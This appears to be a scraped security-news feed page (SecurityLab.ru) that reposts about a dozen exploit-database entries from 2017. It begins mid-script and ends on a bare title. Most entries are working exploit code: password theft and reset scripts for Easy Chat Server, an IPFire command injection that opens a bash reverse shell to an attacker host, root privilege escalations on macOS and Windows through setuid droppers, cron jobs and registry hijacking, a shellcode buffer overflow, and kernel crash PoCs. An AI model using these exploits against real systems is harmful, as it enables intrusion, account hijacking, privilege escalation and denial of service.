Firefox/45.0" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" buffer += "Accept-Language: en-US,en;q=0.5" buffer += "Accept-Encoding: gzip, deflate" buffer += "Referer: http://192.168.1.11/register.ghp" buffer += "Connection: close" buffer += "Content-Type: application/x-www-form-urlencoded" buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register" socket.send(buffer) data = socket.recv(4096) print data socket.close()
Categories: Exploits

IPFire 2.19 - Remote Code Execution

SecurityLab.ru - Mon, 2017-06-12 01:39
# # Title : IPFire 2.19 Firewall Post-Auth RCE # Date : 09/06/2017 # Author : 0x09AL (https://twitter.com/0x09AL) # Tested on: IPFire 2.19 (x86_64) - Core Update 110 # Vendor : http://www.ipfire.org/ # Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso # Vulnerability Description: # The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget. # You need valid credentials to exploit this vulnerability or you can exploit it through CSRF. # # import requests # Adjust the ip and ports. revhost = '192.168.56.1' revport = 1337 url = 'https://192.168.56.102:444/cgi-bin/ids.cgi' username = 'admin' password = 'admin' payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1' evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'} headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'} def verifyVuln(): req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed. if(req.status_code == 200 and "uid=99(nobody)" in req.text): print "[+] IPFire Installation is Vulnerable [+]" revShell() else: print "[+] Not Vulnerable [+]" def revShell(): evildata["OINKCODE"] = '`' + payload + '`' print "[+] Sending Malicious Payload [+]" req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) verifyVuln()
Categories: Exploits

EFS Easy Chat Server 3.1 - Password Disclosure

SecurityLab.ru - Mon, 2017-06-12 01:35
# Exploit Title: Easy Chat Server Remote Password Disclosure # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Pre-Auth Remote Password Disclosure # Severity: Critical # ========================================================================================================= # Registeration page 'register.ghp' allows disclosing ANY user's password. # Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password. # ========================================================================================================= # USAGE: python exploit.py ip username #!/usr/bin/python import urllib import re import requests import sys ip = sys.argv[1] username = sys.argv[2] url = 'http://' + ip + '/register.ghp?username=' + username + '&password=' response = requests.get(url) html = response.content pattern = '' result = re.compile(pattern) password = re.findall(result,html) x = ''.join(password) password = x.replace("[", "") password = x.replace("]", "") print "Password: " + password
Categories: Exploits

EFS Easy Chat Server 3.1 - Password Reset

SecurityLab.ru - Mon, 2017-06-12 01:34
# Exploit Title: Easy Chat Server Remote Password Reset # Date: 09/10/2017 # Software Link: http://echatserver.com/ecssetup.exe # Exploit Author: Aitezaz Mohsin # Vulnerable Version: v2.0 to v3.1 # Vulnerability Type: Pre-Auth Remote Password Reset # Severity: Critical # ==================================================================================================== # Registeration page 'register.ghp' allows resetting ANY user's password. # Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account. # ==================================================================================================== # USAGE: python exploit.py ip port username password #!/usr/bin/python import os,sys,socket ip = sys.argv[1] username = sys.argv[2] password = sys.argv[3] socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM) socket.connect((ip , 80)) buffer = "POST /registresult.htm HTTP/1.1" buffer += "Host: 192.168.1.11" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" buffer += "Accept-Language: en-US,en;q=0.5" buffer += "Accept-Encoding: gzip, deflate" buffer += "Connection: close" buffer += "Content-Type: application/x-www-form-urlencoded" buffer += "UserName=" + username + "&Password=" + password + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change" socket.send(buffer) socket.close() print "[#] Password Changed Successfully"
Categories: Exploits

Apple macOS 10.12.3 / iOS &lt; 10.3.2 - Userspace Entitlement Checking Race Condition

SecurityLab.ru - Mon, 2017-06-12 01:32
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223 One way processes in userspace that offer mach services check whether they should perform an action on behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement. These decisions are made using the audit token which is appended by the kernel to every received mach message. The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.) The canonical way which userspace daemons check a message sender's entitlements is as follows: audit_token_t tok; xpc_connection_get_audit_token(conn, &tok); SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok); CFErrorRef err; CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err); /* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */ The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number to build the SecTaskRef: SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token) { SecTaskRef task; task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token)); ... This leaves two avenues for a sender without an entitlement to talk to a service which requires it: a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement. This pid now maps to the entitlements of that new binary. b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.) The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and have its pid reused by the respawned entitled process. Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes as they are created. You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with another process or launchd so that you can still engage in a full bi-directional communication with the target service even if the audit token was always checked. The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number of whitelisted binaries. This may also open up access to privileged information which is protected by the entitlements. This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access" entitlement and pass the check without having that entitlement. We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it. use an lldb invocation like: sudo lldb -w -n corecaptured then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library. You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon. Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand we could ensure the target service has many messages in its mach port queue to make the race more winnable. PoC tested on MacOS 10.12.3 (16D32) */ // ianbeer #if 0 MacOS/iOS userspace entitlement checking is racy One way processes in userspace that offer mach services check whether they should perform an action on behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement. These decisions are made using the audit token which is appended by the kernel to every received mach message. The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.) The canonical way which userspace daemons check a message sender's entitlements is as follows: audit_token_t tok; xpc_connection_get_audit_token(conn, &tok); SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok); CFErrorRef err; CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err); /* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */ The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number to build the SecTaskRef: SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token) { SecTaskRef task; task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token)); ... This leaves two avenues for a sender without an entitlement to talk to a service which requires it: a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement. This pid now maps to the entitlements of that new binary. b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.) The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and have its pid reused by the respawned entitled process. Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes as they are created. You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with another process or launchd so that you can still engage in a full bi-directional communication with the target service even if the audit token was always checked. The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number of whitelisted binaries. This may also open up access to privileged information which is protected by the entitlements. This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access" entitlement and pass the check without having that entitlement. We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it. use an lldb invocation like: sudo lldb -w -n corecaptured then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library. You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon. Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand we could ensure the target service has many messages in its mach port queue to make the race more winnable. PoC tested on MacOS 10.12.3 (16D32) #endif #include #include #include #include #include void exec_blocking(char* target, char** argv, char** envp) { // create the pipe int pipefds[2]; pipe(pipefds); int read_end = pipefds[0]; int write_end = pipefds[1]; // make the pipe nonblocking so we can fill it int flags = fcntl(write_end, F_GETFL); flags |= O_NONBLOCK; fcntl(write_end, F_SETFL, flags); // fill up the write end int ret, count = 0; do { char ch = ' '; ret = write(write_end, &ch, 1); count++; } while (!(ret == -1 && errno == EAGAIN)); printf("wrote %d bytes to pipe buffer\n", count-1); // make it blocking again flags = fcntl(write_end, F_GETFL); flags &= ~O_NONBLOCK; fcntl(write_end, F_SETFL, flags); // set the pipe write end to stdout/stderr dup2(write_end, 1); dup2(write_end, 2); execve(target, argv, envp); } xpc_connection_t connect(char* service_name){ xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); xpc_connection_set_event_handler(conn, ^(xpc_object_t event) { xpc_type_t t = xpc_get_type(event); if (t == XPC_TYPE_ERROR){ printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION)); } printf("received an event\n"); }); xpc_connection_resume(conn); return conn; } int main(int argc, char** argv, char** envp) { xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0); xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!"); xpc_connection_t conn = connect("com.apple.corecaptured"); xpc_connection_send_message(conn, msg); // exec a binary with the entitlement to talk to that daemon // make sure it doesn't exit by giving it a full pipe for stdout/stderr char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool"; char* target_argv[] = {target_binary, NULL}; exec_blocking(target_binary, target_argv, envp); return 0; }
Categories: Exploits

Apple macOS - Disk Arbitration Daemon Race Condition

SecurityLab.ru - Mon, 2017-06-12 01:32
#!/bin/bash # Sources: # https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh # https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc if ! security authorize system.volume.internal.mount &>/dev/null; then echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work." exit 1 fi TARGET=/private/var/at SUBDIR=tabs DISK=/dev/disk0s1 TMPDIR=/tmp/pwn mkdir -p $TMPDIR cd $TMPDIR cat << EOF > boom.c #include #include #include int main(int argc, char ** argv) { assert(argc == 2); setuid(0); setgid(0); system(argv[1]); } EOF clang boom.c -o _boom || exit 1 race_link() { mkdir -p mounts while true; do ln -snf mounts link ln -snf $TARGET link done } race_mount() { while ! df -h | grep $TARGET >/dev/null; do while df -h | grep $DISK >/dev/null; do diskutil umount $DISK &>/dev/null done while ! df -h | grep $DISK >/dev/null; do diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null done done } cleanup() { echo "Killing child process $PID and cleaning up tmp dir" kill -9 $PID rm -rf $TMPDIR } if df -h | grep $DISK >/dev/null; then echo 2>&1 "$DISK already mounted. Exiting." exit 1 fi race_link & PID=$! trap cleanup EXIT echo "Just imagine having that root shell. It's gonna be legen..." race_mount echo "wait for it..." CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom" rm -f /var/at/tabs/root echo "* * * * *" "$CMD" > /var/at/tabs/root while ! [ -e $TMPDIR/boom ]; do sleep 1 done echo "dary!" kill -9 $PID sleep 0.1 $TMPDIR/boom "rm /var/at/tabs/root" $TMPDIR/boom "umount -f $DISK" $TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
Categories: Exploits

Mapscrn 2.03 - Local Buffer Overflow

SecurityLab.ru - Mon, 2017-06-12 01:30
# Developed using Exploit Pack - http://exploitpack.com - # Tested on: GNU/Linux - Kali 2017.1 Release # # Description: Mapscrn ( Part of setfont ) 2.0.3 # The mapscrn command loads a user defined output character mapping table into the console driver. # The console driver may be later put into use user-defined mapping table mode by outputting a special # escape sequence to the console device. # # An attacker could exploit this vulnerability to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Architecture: all # # Vendor homepage: http://ccross.msk.su # # Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df) # at 0x4831518: strcpy (vg_replace_strmem.c:506) # by 0x10A71F: ??? (in /usr/bin/mapscrn) # by 0x10933B: ??? (in /usr/bin/mapscrn) # by 0x41414140: ??? # # Invalid read of size 2 # at 0x488DFCA: getenv (getenv.c:84) # by 0x48867AE: guess_category_value (dcigettext.c:1587) # by 0x48867AE: __dcigettext (dcigettext.c:667) # by 0x48855F5: dcgettext (dcgettext.c:47) # by 0x109733: ??? (in /usr/bin/mapscrn) # by 0x41414140: ??? # Address 0x41414141 is not stack'd, malloc'd or (recently) free'd # # Process terminating with default action of signal 11 (SIGSEGV) # Access not within mapped region at address 0x41414141 # at 0x488DFCA: getenv (getenv.c:84) # by 0x48867AE: guess_category_value (dcigettext.c:1587) # by 0x48867AE: __dcigettext (dcigettext.c:667) # by 0x48855F5: dcgettext (dcgettext.c:47) # by 0x109733: ??? (in /usr/bin/mapscrn) # by 0x41414140: ??? import os,subprocess junk = "\x41" * 4880 # junk to offset nops = "\x90" * 24 # nops shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" esp = "\xe0\xdf\xff\xbf" # Must be changed buffer = junk + esp + nops + shellcode # Craft the buffer try: print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco") print("[*] Please wait.. running") subprocess.call(["mapscrn", buffer]) except OSError as e: if e.errno == os.errno.ENOENT: print "Mapscrn not found!" else: print "Error executing exploit" raise
Categories: Exploits

Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)

SecurityLab.ru - Fri, 2017-06-09 01:02
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell include Post::Windows::Priv include Post::Windows::Registry include Post::Windows::Runas FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze EXEC_REG_VAL = ''.freeze # This maps to "(Default)" EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze CMD_MAX_LEN = 16383 def initialize(info = {}) super( update_info( info, 'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)', 'Description' => %q{ This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. }, 'License' => MSF_LICENSE, 'Author' => [ 'winscriptingblog', # UAC bypass discovery and research 'amaloteaux', # MSF module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/', 'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1' ] ], 'DisclosureDate' => 'May 12 2017' ) ) end def check if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled? Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit commspec = '%COMSPEC%' registry_view = REGISTRY_VIEW_NATIVE psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe" # Make sure we have a sane payload configuration if sysinfo['Architecture'] == ARCH_X64 if session.arch == ARCH_X86 # fodhelper.exe is x64 only exe commspec = '%WINDIR%\\Sysnative\\cmd.exe' if target_arch.first == ARCH_X64 # We can't use absolute path here as # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session psh_path = "powershell.exe" end end if target_arch.first == ARCH_X86 # Invoking x86, so switch to SysWOW64 psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe" end else # if we're on x86, we can't handle x64 payloads if target_arch.first == ARCH_X64 fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System') end end if !payload.arch.empty? && (payload.arch.first != target_arch.first) fail_with(Failure::BadConfig, 'payload and target should use the same architecture') end # Validate that we can actually do things before we bother # doing any more work check_permissions! case get_uac_level when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT fail_with(Failure::NotVulnerable, "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") when UAC_DEFAULT print_good('UAC is set to Default') print_good('BypassUAC can bypass this setting, continuing...') when UAC_NO_PROMPT print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') shell_execute_exe return end payload_value = rand_text_alpha(8) psh_path = expand_path(psh_path) template_path = Rex::Powershell::Templates::TEMPLATE_DIR psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded) if psh_payload.length > CMD_MAX_LEN fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})") end psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\"" cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}" existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || "" exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil? if existing.empty? registry_createkey(FODHELPER_WRITE_KEY, registry_view) end print_status("Configuring payload and stager registry keys ...") unless exist_delegate registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view) end registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view) registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view) # Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch. cmd_path = expand_path(commspec) cmd_args = expand_path("/c #{FODHELPER_PATH}") print_status("Executing payload: #{cmd_path} #{cmd_args}") # We can't use cmd_exec here because it blocks, waiting for a result. client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true }) # Wait a copule of seconds to give the payload a chance to fire before cleaning up # TODO: fix this up to use something smarter than a timeout? Rex::sleep(5) handler(client) print_status("Cleaining up registry keys ...") unless exist_delegate registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view) end if existing.empty? registry_deletekey(FODHELPER_DEL_KEY, registry_view) else registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view) end registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view) end def check_permissions! fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? # Check if you are an admin vprint_status('Checking admin status...') admin_group = is_in_admin_group? unless check == Exploit::CheckCode::Appears fail_with(Failure::NotVulnerable, "Target is not vulnerable.") end unless is_in_admin_group? fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end print_status('UAC is Enabled, checking level...') if admin_group.nil? print_error('Either whoami is not there or failed to execute') print_error('Continuing under assumption you already checked...') else if admin_group print_good('Part of Administrators group! Continuing...') else fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module') end end if get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level') end end end
Categories: Exploits

DC/OS Marathon UI - Docker Exploit (Metasploit)

SecurityLab.ru - Fri, 2017-06-09 01:01
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DC/OS Marathon UI Docker Exploit', 'Description' => %q{ Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the '/' path mounted with read/write permissions on the host server that is running the docker container. As the docker container executes command as uid 0 it is honored by the host operating system allowing the attacker to edit/create files owed by root. This exploit abuses this to creates a cron job in the '/etc/cron.d/' path of the host server. *Notes: The docker image must be a valid docker image from hub.docker.com. Further more the docker container will only deploy if there are resources available in the DC/OS cluster. }, 'Author' => 'Erik Daguerre', 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'], ], 'Targets' => [ [ 'Python', { 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse noconn none tunnel' } } } ] ], 'DefaultOptions' => { 'WfsDelay' => 75 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 03, 2017')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]), OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']), OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ]) ]) end def get_apps res = send_request_raw({ 'method' => 'GET', 'uri' => target_uri.path }) return unless res and res.code == 200 # verify it is marathon ui, and is returning content-type json return unless res.headers.to_json.include? 'Marathon' and res.headers['Content-Type'].include? 'application/json' apps = JSON.parse(res.body) apps end def del_container(container_id) res = send_request_raw({ 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, container_id) }) return unless res and res.code == 200 res.code end def make_container_id return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil? rand_text_alpha_lower(8) end def make_cmd(mnt_path, cron_path, payload_path) vprint_status('Creating the docker container command') payload_data = nil echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path cron_command = "python #{payload_path}" payload_data = payload.raw command = "echo \"#{payload_data}\" >> #{echo_payload_path}\n" command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path}\n" command << "echo \"\" >> #{echo_cron_path}\n" command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}\n" command << "sleep 120" command end def make_container(mnt_path, cron_path, payload_path, container_id) vprint_status('Setting container json request variables') container_data = { 'cmd' => make_cmd(mnt_path, cron_path, payload_path), 'cpus' => 1, 'mem' => 128, 'disk' => 0, 'instances' => 1, 'id' => container_id, 'container' => { 'docker' => { 'image' => datastore['DOCKERIMAGE'], 'network' => 'HOST', }, 'type' => 'DOCKER', 'volumes' => [ { 'hostPath' => '/', 'containerPath' => mnt_path, 'mode' => 'RW' } ], }, 'env' => {}, 'labels' => {} } container_data end def check return Exploit::CheckCode::Safe if get_apps.nil? Exploit::CheckCode::Appears end def exploit if get_apps.nil? fail_with(Failure::Unknown, 'Failed to connect to the targeturi') end # create required information to create json container information. cron_path = '/etc/cron.d/' + rand_text_alpha(8) payload_path = '/tmp/' + rand_text_alpha(8) mnt_path = '/mnt/' + rand_text_alpha(8) container_id = make_container_id() res = send_request_raw({ 'method' => 'POST', 'uri' => target_uri.path, 'data' => make_container(mnt_path, cron_path, payload_path, container_id).to_json }) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res and res.code == 201 print_status('The docker container is created, waiting for it to deploy') register_files_for_cleanup(cron_path, payload_path) sleep_time = 5 wait_time = datastore['WAIT_TIMEOUT'] deleted_container = false print_status("Waiting up to #{wait_time} seconds for docker container to start") while wait_time > 0 sleep(sleep_time) wait_time -= sleep_time apps_status = get_apps fail_with(Failure::Unknown, 'No apps returned') unless apps_status apps_status['apps'].each do |app| next if app['id'] != "/#{container_id}" if app['tasksRunning'] == 1 print_status('The docker container is running, removing it') del_container(container_id) deleted_container = true wait_time = 0 else vprint_status('The docker container is not yet running') end break end end # If the docker container does not deploy remove it and fail out. unless deleted_container del_container(container_id) fail_with(Failure::Unknown, "The docker container failed to start") end print_status('Waiting for the cron job to run, can take up to 60 seconds') end end
Categories: Exploits

VMware Workstation 12 Pro - Denial of Service

SecurityLab.ru - Fri, 2017-06-09 00:57
/* * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player) * CVE: 2017-4916 (VMSA-2017-0009) * Author: Borja Merino (@BorjaMerino) * Date: May 18, 2017 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757) * Affected: VMware Workstation Pro/Player 12.x * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check) */ #include "windows.h" #include "stdio.h" void ioctl_crash() { HANDLE hfile; WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared"; DWORD dummy; char reply[0x3FDC]; hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab"; DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL); } void run_vix() { STARTUPINFO si; PROCESS_INFORMATION pi; RtlZeroMemory(&si, sizeof(si)); RtlZeroMemory(&pi, sizeof(pi)); si.dwFlags |= STARTF_USESHOWWINDOW; si.wShowWindow = SW_HIDE; DWORD createFlags = CREATE_SUSPENDED; CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); } void main() { run_vix(); //Comment this if vixDiskMountServer.exe is already running ioctl_crash(); }
Categories: Exploits

Linux Kernel - 'ping' Local Denial of Service

SecurityLab.ru - Fri, 2017-06-09 00:56
# Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c # #include #include #include #include static int sockfd = 0; static struct sockaddr_in addr = {0}; void fuzz(void * param){ while(1){ addr.sin_family = 0;//rand()%42; printf("sin_family1 = %08lx\n", addr.sin_family); connect(sockfd, (struct sockaddr *)&addr, 16); } } int main(int argc, char **argv) { sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP); int thrd; pthread_create(&thrd, NULL, fuzz, NULL); while(1){ addr.sin_family = 0x1a;//rand()%42; addr.sin_port = 0; addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); connect(sockfd, (struct sockaddr *)&addr, 16); addr.sin_family = 0; } return 0; }
Categories: Exploits

EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution

SecurityLab.ru - Tue, 2017-06-06 02:29
